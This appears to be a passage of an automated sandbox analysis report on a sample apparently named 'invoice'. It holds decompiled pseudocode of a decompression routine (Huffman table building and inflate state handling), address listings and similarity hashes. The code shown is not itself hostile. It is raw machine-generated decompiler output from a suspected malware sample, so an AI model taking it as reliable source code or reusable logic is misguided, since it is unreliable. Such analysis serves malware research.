                                            											__ecx = __esi[0x26e8];
                                            											__edx =  *(__ebp - 0x30);
                                            											__eflags = __edx - __ecx;
                                            											if(__edx != __ecx) {
                                            												L38:
                                            												__esi[0x26ea] = __edx;
                                            												__eax = E00406EB1( *((intOrPtr*)(__ebp + 8)));
                                            												__edx = __esi[0x26ea];
                                            												__ecx = __esi[0x26e9];
                                            												__eflags = __edx - __ecx;
                                            												 *(__ebp - 0x30) = __edx;
                                            												if(__edx >= __ecx) {
                                            													__eax = __esi[0x26e8];
                                            													__eax = __esi[0x26e8] - __edx;
                                            													__eflags = __eax;
                                            												} else {
                                            													__ecx = __ecx - __edx;
                                            													__eax = __ecx - __edx - 1;
                                            												}
                                            												__edi = __esi[0x26e8];
                                            												 *(__ebp - 0x2c) = __eax;
                                            												__eflags = __edx - __edi;
                                            												if(__edx == __edi) {
                                            													__edx =  &(__esi[0x6e8]);
                                            													__eflags = __edx - __ecx;
                                            													if(__eflags != 0) {
                                            														 *(__ebp - 0x30) = __edx;
                                            														if(__eflags >= 0) {
                                            															__edi = __edi - __edx;
                                            															__eflags = __edi;
                                            															__eax = __edi;
                                            														} else {
                                            															__ecx = __ecx - __edx;
                                            															__eax = __ecx;
                                            														}
                                            														 *(__ebp - 0x2c) = __eax;
                                            													}
                                            												}
                                            												__eflags = __eax;
                                            												if(__eax == 0) {
                                            													goto L183;
                                            												} else {
                                            													goto L48;
                                            												}
                                            											}
                                            											L33:
                                            											__eax = __esi[0x26e9];
                                            											__edi =  &(__esi[0x6e8]);
                                            											__eflags = __eax - __edi;
                                            											if(__eax == __edi) {
                                            												goto L38;
                                            											}
                                            											L34:
                                            											__edx = __edi;
                                            											__eflags = __edx - __eax;
                                            											 *(__ebp - 0x30) = __edx;
                                            											if(__edx >= __eax) {
                                            												__ecx = __ecx - __edx;
                                            												__eflags = __ecx;
                                            												__eax = __ecx;
                                            											} else {
                                            												__eax = __eax - __edx;
                                            												__eax = __eax - 1;
                                            											}
                                            											__eflags = __eax;
                                            											 *(__ebp - 0x2c) = __eax;
                                            											if(__eax != 0) {
                                            												goto L48;
                                            											} else {
                                            												goto L38;
                                            											}
                                            										case 0xb:
                                            											goto L56;
                                            										case 0xc:
                                            											L60:
                                            											__esi[1] = __esi[1] >> 0xa;
                                            											__eax = (__esi[1] >> 0xa) + 4;
                                            											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                                            												goto L68;
                                            											}
                                            											goto L61;
                                            										case 0xd:
                                            											while(1) {
                                            												L93:
                                            												__eax = __esi[1];
                                            												__ecx = __esi[2];
                                            												__edx = __eax;
                                            												__eax = __eax & 0x0000001f;
                                            												__edx = __edx >> 5;
                                            												__eax = __edx + __eax + 0x102;
                                            												__eflags = __esi[2] - __eax;
                                            												if(__esi[2] >= __eax) {
                                            													break;
                                            												}
                                            												L73:
                                            												__eax = __esi[0x143];
                                            												while(1) {
                                            													L76:
                                            													__eflags = __ebx - __eax;
                                            													if(__ebx >= __eax) {
                                            														break;
                                            													}
                                            													L74:
                                            													__eflags =  *(__ebp - 0x34);
                                            													if( *(__ebp - 0x34) == 0) {
                                            														goto L182;
                                            													}
                                            													L75:
                                            													__ecx =  *(__ebp - 0x38);
                                            													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                            													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                            													__ecx = __ebx;
                                            													__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                            													 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                            													 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                            													__ebx = __ebx + 8;
                                            													__eflags = __ebx;
                                            												}
                                            												L77:
                                            												__eax =  *(0x40a3e8 + __eax * 2) & 0x0000ffff;
                                            												__eax = __eax &  *(__ebp - 0x40);
                                            												__ecx = __esi[0x144];
                                            												__eax = __esi[0x144] + __eax * 4;
                                            												__edx =  *(__eax + 1) & 0x000000ff;
                                            												__eax =  *(__eax + 2) & 0x0000ffff;
                                            												__eflags = __eax - 0x10;
                                            												 *(__ebp - 0x14) = __eax;
                                            												if(__eax >= 0x10) {
                                            													L79:
                                            													__eflags = __eax - 0x12;
                                            													if(__eax != 0x12) {
                                            														__eax = __eax + 0xfffffff2;
                                            														 *(__ebp - 8) = 3;
                                            													} else {
                                            														_push(7);
                                            														 *(__ebp - 8) = 0xb;
                                            														_pop(__eax);
                                            													}
                                            													while(1) {
                                            														L84:
                                            														__ecx = __eax + __edx;
                                            														__eflags = __ebx - __eax + __edx;
                                            														if(__ebx >= __eax + __edx) {
                                            															break;
                                            														}
                                            														L82:
                                            														__eflags =  *(__ebp - 0x34);
                                            														if( *(__ebp - 0x34) == 0) {
                                            															goto L182;
                                            														}
                                            														L83:
                                            														__ecx =  *(__ebp - 0x38);
                                            														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                            														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
                                            														__ecx = __ebx;
                                            														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                            														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                            														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                            														__ebx = __ebx + 8;
                                            														__eflags = __ebx;
                                            													}
                                            													L85:
                                            													__ecx = __edx;
                                            													__ebx = __ebx - __edx;
                                            													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                            													 *(0x40a3e8 + __eax * 2) & 0x0000ffff =  *(0x40a3e8 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                            													__edx =  *(__ebp - 8);
                                            													__ebx = __ebx - __eax;
                                            													__edx =  *(__ebp - 8) + ( *(0x40a3e8 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                            													__ecx = __eax;
                                            													__eax = __esi[1];
                                            													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                            													__ecx = __esi[2];
                                            													__eax = __eax >> 5;
                                            													__edi = __eax >> 0x00000005 & 0x0000001f;
                                            													__eax = __eax & 0x0000001f;
                                            													__eax = __edi + __eax + 0x102;
                                            													__edi = __edx + __ecx;
                                            													__eflags = __edx + __ecx - __eax;
                                            													if(__edx + __ecx > __eax) {
                                            														goto L9;
                                            													}
                                            													L86:
                                            													__eflags =  *(__ebp - 0x14) - 0x10;
                                            													if( *(__ebp - 0x14) != 0x10) {
                                            														L89:
                                            														__edi = 0;
                                            														__eflags = 0;
                                            														L90:
                                            														__eax = __esi + 0xc + __ecx * 4;
                                            														do {
                                            															L91:
                                            															 *__eax = __edi;
                                            															__ecx = __ecx + 1;
                                            															__eax = __eax + 4;
                                            															__edx = __edx - 1;
                                            															__eflags = __edx;
                                            														} while (__edx != 0);
                                            														__esi[2] = __ecx;
                                            														continue;
                                            													}
                                            													L87:
                                            													__eflags = __ecx - 1;
                                            													if(__ecx < 1) {
                                            														goto L9;
                                            													}
                                            													L88:
                                            													__edi =  *(__esi + 8 + __ecx * 4);
                                            													goto L90;
                                            												}
                                            												L78:
                                            												__ecx = __edx;
                                            												__ebx = __ebx - __edx;
                                            												 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                            												__ecx = __esi[2];
                                            												 *(__esi + 0xc + __esi[2] * 4) = __eax;
                                            												__esi[2] = __esi[2] + 1;
                                            											}
                                            											L94:
                                            											__eax = __esi[1];
                                            											__esi[0x144] = __esi[0x144] & 0x00000000;
                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) & 0x00000000;
                                            											__edi = __eax;
                                            											__eax = __eax >> 5;
                                            											__edi = __edi & 0x0000001f;
                                            											__ecx = 0x101;
                                            											__eax = __eax & 0x0000001f;
                                            											__edi = __edi + 0x101;
                                            											__eax = __eax + 1;
                                            											__edx = __ebp - 0xc;
                                            											 *(__ebp - 0x14) = __eax;
                                            											 &(__esi[0x148]) = __ebp - 4;
                                            											 *(__ebp - 4) = 9;
                                            											__ebp - 0x18 =  &(__esi[3]);
                                            											 *(__ebp - 0x10) = 6;
                                            											__eax = E00406F19( &(__esi[3]), __edi, 0x101, 0x40840c, 0x40844c, __ebp - 0x18, __ebp - 4,  &(__esi[0x148]), __ebp - 0xc);
                                            											__eflags =  *(__ebp - 4);
                                            											if( *(__ebp - 4) == 0) {
                                            												__eax = __eax | 0xffffffff;
                                            												__eflags = __eax;
                                            											}
                                            											__eflags = __eax;
                                            											if(__eax != 0) {
                                            												goto L9;
                                            											} else {
                                            												L97:
                                            												__ebp - 0xc =  &(__esi[0x148]);
                                            												__ebp - 0x10 = __ebp - 0x1c;
                                            												__eax = __esi + 0xc + __edi * 4;
                                            												__eax = E00406F19(__esi + 0xc + __edi * 4,  *(__ebp - 0x14), 0, 0x40848c, 0x4084c8, __ebp - 0x1c, __ebp - 0x10,  &(__esi[0x148]), __ebp - 0xc);
                                            												__eflags = __eax;
                                            												if(__eax != 0) {
                                            													goto L9;
                                            												}
                                            												L98:
                                            												__eax =  *(__ebp - 0x10);
                                            												__eflags =  *(__ebp - 0x10);
                                            												if( *(__ebp - 0x10) != 0) {
                                            													L100:
                                            													__cl =  *(__ebp - 4);
                                            													 *__esi =  *__esi & 0x00000000;
                                            													__eflags =  *__esi;
                                            													__esi[4] = __al;
                                            													__eax =  *(__ebp - 0x18);
                                            													__esi[5] =  *(__ebp - 0x18);
                                            													__eax =  *(__ebp - 0x1c);
                                            													__esi[4] = __cl;
                                            													__esi[6] =  *(__ebp - 0x1c);
                                            													goto L101;
                                            												}
                                            												L99:
                                            												__eflags = __edi - 0x101;
                                            												if(__edi > 0x101) {
                                            													goto L9;
                                            												}
                                            												goto L100;
                                            											}
                                            										case 0xe:
                                            											goto L9;
                                            										case 0xf:
                                            											L175:
                                            											__eax =  *(__ebp - 0x30);
                                            											__esi[0x26ea] =  *(__ebp - 0x30);
                                            											__eax = E00406EB1( *((intOrPtr*)(__ebp + 8)));
                                            											__ecx = __esi[0x26ea];
                                            											__edx = __esi[0x26e9];
                                            											__eflags = __ecx - __edx;
                                            											 *(__ebp - 0x30) = __ecx;
                                            											if(__ecx >= __edx) {
                                            												__eax = __esi[0x26e8];
                                            												__eax = __esi[0x26e8] - __ecx;
                                            												__eflags = __eax;
                                            											} else {
                                            												__edx = __edx - __ecx;
                                            												__eax = __edx - __ecx - 1;
                                            											}
                                            											__eflags = __ecx - __edx;
                                            											 *(__ebp - 0x2c) = __eax;
                                            											if(__ecx != __edx) {
                                            												L183:
                                            												__edi = 0;
                                            												goto L10;
                                            											} else {
                                            												L179:
                                            												__eax = __esi[0x145];
                                            												__eflags = __eax - 8;
                                            												 *__esi = __eax;
                                            												if(__eax != 8) {
                                            													L184:
                                            													0 = 1;
                                            													goto L10;
                                            												}
                                            												goto L180;
                                            											}
                                            									}
                                            								}
                                            								L181:
                                            								goto L9;
                                            							}
                                            							L70:
                                            							if( *__edi == __eax) {
                                            								goto L72;
                                            							}
                                            							L71:
                                            							__esi[2] = __esi[2] & __eax;
                                            							 *__esi = 0xd;
                                            							goto L93;
                                            						}
                                            					}
                                            				}
                                            				L182:
                                            				_t443 = 0;
                                            				_t446[0x147] =  *(_t448 - 0x40);
                                            				_t446[0x146] = _t425;
                                            				( *(_t448 + 8))[1] = 0;
                                            				goto L11;
                                            			}









                                            0x00406d58
                                            0x00406d5a
                                            0x00406d5c
                                            0x00406d63
                                            0x00406d63
                                            0x00406d65
                                            0x00406d5e
                                            0x00406d5e
                                            0x00406d60
                                            0x00406d60
                                            0x00406d67
                                            0x00406d69
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00406de1
                                            0x00406de1
                                            0x00406de4
                                            0x00406de6
                                            0x00406de9
                                            0x00406dec
                                            0x00406dec
                                            0x00406dec
                                            0x00406dec
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0040649a
                                            0x0040647e
                                            0x00000000
                                            0x00406484
                                            0x00406487
                                            0x00406491
                                            0x00406494
                                            0x00406497
                                            0x00000000
                                            0x00406497
                                            0x0040647e
                                            0x004064a2
                                            0x004064a5
                                            0x004064a9
                                            0x004064b3
                                            0x004064bd
                                            0x004064c0
                                            0x004064c6
                                            0x004065fa
                                            0x004065fc
                                            0x00406602
                                            0x00406605
                                            0x00406608
                                            0x00000000
                                            0x00406608
                                            0x004064cc
                                            0x004064cc
                                            0x004064cd
                                            0x00406525
                                            0x00406525
                                            0x0040652c
                                            0x004065d2
                                            0x004065d2
                                            0x004065d7
                                            0x004065da
                                            0x004065df
                                            0x004065e2
                                            0x004065e7
                                            0x004065ea
                                            0x004065ef
                                            0x004065f2
                                            0x004065f2
                                            0x00000000
                                            0x00406532
                                            0x00406532
                                            0x00406532
                                            0x00406532
                                            0x00406536
                                            0x00406536
                                            0x00406558
                                            0x0040655b
                                            0x0040655d
                                            0x00406560
                                            0x00406565
                                            0x0040653b
                                            0x0040653b
                                            0x00406540
                                            0x00406542
                                            0x00406544
                                            0x00406549
                                            0x0040654f
                                            0x00406554
                                            0x00406556
                                            0x00406556
                                            0x0040654b
                                            0x0040654b
                                            0x0040654b
                                            0x00406549
                                            0x00000000
                                            0x00406567
                                            0x00406594
                                            0x00406599
                                            0x0040659b
                                            0x0040659c
                                            0x0040659e
                                            0x0040659f
                                            0x0040659f
                                            0x0040659f
                                            0x004065c7
                                            0x004065cc
                                            0x004065cc
                                            0x00000000
                                            0x004065cc
                                            0x00406565
                                            0x0040652c
                                            0x004064cf
                                            0x004064cf
                                            0x004064d0
                                            0x0040651a
                                            0x00000000
                                            0x0040651a
                                            0x004064d2
                                            0x004064d3
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0040662f
                                            0x0040662f
                                            0x0040662f
                                            0x00406632
                                            0x00000000
                                            0x00000000
                                            0x0040660f
                                            0x0040660f
                                            0x00406613
                                            0x00000000
                                            0x00000000
                                            0x00406619
                                            0x00406619
                                            0x0040661c
                                            0x0040661f
                                            0x00406624
                                            0x00406626
                                            0x00406629
                                            0x0040662c
                                            0x0040662c
                                            0x0040662c
                                            0x00406634
                                            0x00406634
                                            0x00406637
                                            0x00406639
                                            0x0040663e
                                            0x00406641
                                            0x00406643
                                            0x00406646
                                            0x00000000
                                            0x00000000
                                            0x0040664c
                                            0x0040664c
                                            0x0040664e
                                            0x00000000
                                            0x00000000
                                            0x00406654
                                            0x00406654
                                            0x00406658
                                            0x00000000
                                            0x00000000
                                            0x0040665e
                                            0x0040665e
                                            0x00406661
                                            0x00406663
                                            0x00406701
                                            0x00406701
                                            0x00406704
                                            0x00406706
                                            0x00406706
                                            0x00406709
                                            0x0040670c
                                            0x0040670e
                                            0x00406710
                                            0x00406712
                                            0x00406712
                                            0x0040671b
                                            0x00406720
                                            0x00406723
                                            0x00406726
                                            0x00406729
                                            0x0040672c
                                            0x0040672c
                                            0x0040672c
                                            0x0040672f
                                            0x00406735
                                            0x00406735
                                            0x0040673b
                                            0x0040673b
                                            0x0040673b
                                            0x00000000
                                            0x0040672f
                                            0x00406669
                                            0x00406669
                                            0x0040666f
                                            0x00406672
                                            0x00406674
                                            0x0040669f
                                            0x004066a2
                                            0x004066a8
                                            0x004066ad
                                            0x004066b3
                                            0x004066b9
                                            0x004066bb
                                            0x004066be
                                            0x004066c7
                                            0x004066cd
                                            0x004066cd
                                            0x004066c0
                                            0x004066c2
                                            0x004066c4
                                            0x004066c4
                                            0x004066cf
                                            0x004066d5
                                            0x004066d8
                                            0x004066da
                                            0x004066dc
                                            0x004066e2
                                            0x004066e4
                                            0x004066e6
                                            0x004066e9
                                            0x004066f2
                                            0x004066f2
                                            0x004066f4
                                            0x004066eb
                                            0x004066eb
                                            0x004066ee
                                            0x004066ee
                                            0x004066f6
                                            0x004066f6
                                            0x004066e4
                                            0x004066f9
                                            0x004066fb
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004066fb
                                            0x00406676
                                            0x00406676
                                            0x0040667c
                                            0x00406682
                                            0x00406684
                                            0x00000000
                                            0x00000000
                                            0x00406686
                                            0x00406686
                                            0x00406688
                                            0x0040668a
                                            0x0040668d
                                            0x00406694
                                            0x00406694
                                            0x00406696
                                            0x0040668f
                                            0x0040668f
                                            0x00406691
                                            0x00406691
                                            0x00406698
                                            0x0040669a
                                            0x0040669d
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004067a1
                                            0x004067a4
                                            0x004067a7
                                            0x004067ad
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00406984
                                            0x00406984
                                            0x00406984
                                            0x00406987
                                            0x0040698a
                                            0x0040698c
                                            0x0040698f
                                            0x00406995
                                            0x0040699c
                                            0x0040699e
                                            0x00000000
                                            0x00000000
                                            0x00406872
                                            0x00406872
                                            0x0040689a
                                            0x0040689a
                                            0x0040689a
                                            0x0040689c
                                            0x00000000
                                            0x00000000
                                            0x0040687a
                                            0x0040687a
                                            0x0040687e
                                            0x00000000
                                            0x00000000
                                            0x00406884
                                            0x00406884
                                            0x00406887
                                            0x0040688a
                                            0x0040688d
                                            0x0040688f
                                            0x00406891
                                            0x00406894
                                            0x00406897
                                            0x00406897
                                            0x00406897
                                            0x0040689e
                                            0x0040689e
                                            0x004068a6
                                            0x004068a9
                                            0x004068af
                                            0x004068b2
                                            0x004068b6
                                            0x004068ba
                                            0x004068bd
                                            0x004068c0
                                            0x004068d8
                                            0x004068d8
                                            0x004068db
                                            0x004068e9
                                            0x004068ec
                                            0x004068dd
                                            0x004068dd
                                            0x004068df
                                            0x004068e6
                                            0x004068e6
                                            0x00406915
                                            0x00406915
                                            0x00406915
                                            0x00406918
                                            0x0040691a
                                            0x00000000
                                            0x00000000
                                            0x004068f5
                                            0x004068f5
                                            0x004068f9
                                            0x00000000
                                            0x00000000
                                            0x004068ff
                                            0x004068ff
                                            0x00406902
                                            0x00406905
                                            0x00406908
                                            0x0040690a
                                            0x0040690c
                                            0x0040690f
                                            0x00406912
                                            0x00406912
                                            0x00406912
                                            0x0040691c
                                            0x0040691c
                                            0x0040691e
                                            0x00406920
                                            0x0040692b
                                            0x0040692e
                                            0x00406931
                                            0x00406933
                                            0x00406935
                                            0x00406937
                                            0x0040693a
                                            0x0040693d
                                            0x00406942
                                            0x00406945
                                            0x00406948
                                            0x0040694b
                                            0x00406952
                                            0x00406955
                                            0x00406957
                                            0x00000000
                                            0x00000000
                                            0x0040695d
                                            0x0040695d
                                            0x00406961
                                            0x00406972
                                            0x00406972
                                            0x00406972
                                            0x00406974
                                            0x00406974
                                            0x00406978
                                            0x00406978
                                            0x00406978
                                            0x0040697a
                                            0x0040697b
                                            0x0040697e
                                            0x0040697e
                                            0x0040697e
                                            0x00406981
                                            0x00000000
                                            0x00406981
                                            0x00406963
                                            0x00406963
                                            0x00406966
                                            0x00000000
                                            0x00000000
                                            0x0040696c
                                            0x0040696c
                                            0x00000000
                                            0x0040696c
                                            0x004068c2
                                            0x004068c2
                                            0x004068c4
                                            0x004068c6
                                            0x004068c9
                                            0x004068cc
                                            0x004068d0
                                            0x004068d0
                                            0x004069a4
                                            0x004069a4
                                            0x004069a7
                                            0x004069ae
                                            0x004069b2
                                            0x004069b4
                                            0x004069b7
                                            0x004069ba
                                            0x004069bf
                                            0x004069c2
                                            0x004069c4
                                            0x004069c5
                                            0x004069c8
                                            0x004069d3
                                            0x004069d6
                                            0x004069ed
                                            0x004069f2
                                            0x004069f9
                                            0x004069fe
                                            0x00406a02
                                            0x00406a04
                                            0x00406a04
                                            0x00406a04
                                            0x00406a07
                                            0x00406a09
                                            0x00000000
                                            0x00406a0f
                                            0x00406a0f
                                            0x00406a13
                                            0x00406a1e
                                            0x00406a31
                                            0x00406a36
                                            0x00406a3b
                                            0x00406a3d
                                            0x00000000
                                            0x00000000
                                            0x00406a43
                                            0x00406a43
                                            0x00406a46
                                            0x00406a48
                                            0x00406a56
                                            0x00406a56
                                            0x00406a59
                                            0x00406a59
                                            0x00406a5c
                                            0x00406a5f
                                            0x00406a62
                                            0x00406a65
                                            0x00406a68
                                            0x00406a6b
                                            0x00000000
                                            0x00406a6b
                                            0x00406a4a
                                            0x00406a4a
                                            0x00406a50
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00406a50
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00406def
                                            0x00406def
                                            0x00406df5
                                            0x00406dfb
                                            0x00406e00
                                            0x00406e06
                                            0x00406e0c
                                            0x00406e0e
                                            0x00406e11
                                            0x00406e1a
                                            0x00406e20
                                            0x00406e20
                                            0x00406e13
                                            0x00406e15
                                            0x00406e17
                                            0x00406e17
                                            0x00406e22
                                            0x00406e24
                                            0x00406e27
                                            0x00406e62
                                            0x00406e62
                                            0x00000000
                                            0x00406e29
                                            0x00406e29
                                            0x00406e29
                                            0x00406e2f
                                            0x00406e32
                                            0x00406e34
                                            0x00406e69
                                            0x00406e6b
                                            0x00000000
                                            0x00406e6b
                                            0x00000000
                                            0x00406e34
                                            0x00000000
                                            0x00406473
                                            0x00406e41
                                            0x00000000
                                            0x00406e41
                                            0x00406855
                                            0x00406857
                                            0x00000000
                                            0x00000000
                                            0x00406859
                                            0x00406859
                                            0x0040685c
                                            0x00000000
                                            0x0040685c
                                            0x004067a1
                                            0x00406762
                                            0x00406e46
                                            0x00406e49
                                            0x00406e4b
                                            0x00406e54
                                            0x00406e5a
                                            0x00000000

                                            Memory Dump Source
                                            • Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_invoice.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8a4aeacf9715bb3b10a0377ad2d0224b4eefc29aff23ed095be582f5b156e71c
                                            • Instruction ID: 12ef56279526f9f53f22afc89151adbe845766d01d6fb7ada6890335ffbed449
                                            • Opcode Fuzzy Hash: 8a4aeacf9715bb3b10a0377ad2d0224b4eefc29aff23ed095be582f5b156e71c
                                            • Instruction Fuzzy Hash: 5EE19A7190070ADFCB24CF58C980BAABBF1EB45305F15852EE497A72D1E338AA91CF44
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00406F19(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
                                            				signed int _v8;
                                            				unsigned int _v12;
                                            				signed int _v16;
                                            				intOrPtr _v20;
                                            				signed int _v24;
                                            				signed int _v28;
                                            				intOrPtr* _v32;
                                            				signed int* _v36;
                                            				signed int _v40;
                                            				signed int _v44;
                                            				intOrPtr _v48;
                                            				intOrPtr _v52;
                                            				void _v116;
                                            				signed int _v176;
                                            				signed int _v180;
                                            				signed int _v240;
                                            				signed int _t166;
                                            				signed int _t168;
                                            				intOrPtr _t175;
                                            				signed int _t181;
                                            				void* _t182;
                                            				intOrPtr _t183;
                                            				signed int* _t184;
                                            				signed int _t186;
                                            				signed int _t187;
                                            				signed int* _t189;
                                            				signed int _t190;
                                            				intOrPtr* _t191;
                                            				intOrPtr _t192;
                                            				signed int _t193;
                                            				signed int _t195;
                                            				signed int _t200;
                                            				signed int _t205;
                                            				void* _t207;
                                            				short _t208;
                                            				signed char _t222;
                                            				signed int _t224;
                                            				signed int _t225;
                                            				signed int* _t232;
                                            				signed int _t233;
                                            				signed int _t234;
                                            				void* _t235;
                                            				signed int _t236;
                                            				signed int _t244;
                                            				signed int _t246;
                                            				signed int _t251;
                                            				signed int _t254;
                                            				signed int _t256;
                                            				signed int _t259;
                                            				signed int _t262;
                                            				void* _t263;
                                            				void* _t264;
                                            				signed int _t267;
                                            				intOrPtr _t269;
                                            				intOrPtr _t271;
                                            				signed int _t274;
                                            				intOrPtr* _t275;
                                            				unsigned int _t276;
                                            				void* _t277;
                                            				signed int _t278;
                                            				intOrPtr* _t279;
                                            				signed int _t281;
                                            				intOrPtr _t282;
                                            				intOrPtr _t283;
                                            				signed int* _t284;
                                            				signed int _t286;
                                            				signed int _t287;
                                            				signed int _t288;
                                            				signed int _t296;
                                            				signed int* _t297;
                                            				intOrPtr _t298;
                                            				void* _t299;
                                            
                                            				_t278 = _a8;
                                            				_t187 = 0x10;
                                            				memset( &_v116, 0, _t187 << 2);
                                            				_t189 = _a4;
                                            				_t233 = _t278;
                                            				do {
                                            					_t166 =  *_t189;
                                            					_t189 =  &(_t189[1]);
                                            					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
                                            					_t233 = _t233 - 1;
                                            				} while (_t233 != 0);
                                            				if(_v116 != _t278) {
                                            					_t279 = _a28;
                                            					_t267 =  *_t279;
                                            					_t190 = 1;
                                            					_a28 = _t267;
                                            					_t234 = 0xf;
                                            					while(1) {
                                            						_t168 = 0;
                                            						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
                                            							break;
                                            						}
                                            						_t190 = _t190 + 1;
                                            						if(_t190 <= _t234) {
                                            							continue;
                                            						}
                                            						break;
                                            					}
                                            					_v8 = _t190;
                                            					if(_t267 < _t190) {
                                            						_a28 = _t190;
                                            					}
                                            					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
                                            						_t234 = _t234 - 1;
                                            						if(_t234 != 0) {
                                            							continue;
                                            						}
                                            						break;
                                            					}
                                            					_v28 = _t234;
                                            					if(_a28 > _t234) {
                                            						_a28 = _t234;
                                            					}
                                            					 *_t279 = _a28;
                                            					_t181 = 1 << _t190;
                                            					while(_t190 < _t234) {
                                            						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
                                            						if(_t182 < 0) {
                                            							L64:
                                            							return _t168 | 0xffffffff;
                                            						}
                                            						_t190 = _t190 + 1;
                                            						_t181 = _t182 + _t182;
                                            					}
                                            					_t281 = _t234 << 2;
                                            					_t191 = _t299 + _t281 - 0x70;
                                            					_t269 =  *_t191;
                                            					_t183 = _t181 - _t269;
                                            					_v52 = _t183;
                                            					if(_t183 < 0) {
                                            						goto L64;
                                            					}
                                            					_v176 = _t168;
                                            					 *_t191 = _t269 + _t183;
                                            					_t192 = 0;
                                            					_t235 = _t234 - 1;
                                            					if(_t235 == 0) {
                                            						L21:
                                            						_t184 = _a4;
                                            						_t271 = 0;
                                            						do {
                                            							_t193 =  *_t184;
                                            							_t184 =  &(_t184[1]);
                                            							if(_t193 != _t168) {
                                            								_t232 = _t299 + _t193 * 4 - 0xb0;
                                            								_t236 =  *_t232;
                                            								 *((intOrPtr*)(0x42d688 + _t236 * 4)) = _t271;
                                            								 *_t232 = _t236 + 1;
                                            							}
                                            							_t271 = _t271 + 1;
                                            						} while (_t271 < _a8);
                                            						_v16 = _v16 | 0xffffffff;
                                            						_v40 = _v40 & 0x00000000;
                                            						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
                                            						_t195 = _v8;
                                            						_t186 =  ~_a28;
                                            						_v12 = _t168;
                                            						_v180 = _t168;
                                            						_v36 = 0x42d688;
                                            						_v240 = _t168;
                                            						if(_t195 > _v28) {
                                            							L62:
                                            							_t168 = 0;
                                            							if(_v52 == 0 || _v28 == 1) {
                                            								return _t168;
                                            							} else {
                                            								goto L64;
                                            							}
                                            						}
                                            						_v44 = _t195 - 1;
                                            						_v32 = _t299 + _t195 * 4 - 0x70;
                                            						do {
                                            							_t282 =  *_v32;
                                            							if(_t282 == 0) {
                                            								goto L61;
                                            							}
                                            							while(1) {
                                            								_t283 = _t282 - 1;
                                            								_t200 = _a28 + _t186;
                                            								_v48 = _t283;
                                            								_v24 = _t200;
                                            								if(_v8 <= _t200) {
                                            									goto L45;
                                            								}
                                            								L31:
                                            								_v20 = _t283 + 1;
                                            								do {
                                            									_v16 = _v16 + 1;
                                            									_t296 = _v28 - _v24;
                                            									if(_t296 > _a28) {
                                            										_t296 = _a28;
                                            									}
                                            									_t222 = _v8 - _v24;
                                            									_t254 = 1 << _t222;
                                            									if(1 <= _v20) {
                                            										L40:
                                            										_t256 =  *_a36;
                                            										_t168 = 1 << _t222;
                                            										_v40 = 1;
                                            										_t274 = _t256 + 1;
                                            										if(_t274 > 0x5a0) {
                                            											goto L64;
                                            										}
                                            									} else {
                                            										_t275 = _v32;
                                            										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
                                            										if(_t222 >= _t296) {
                                            											goto L40;
                                            										}
                                            										while(1) {
                                            											_t222 = _t222 + 1;
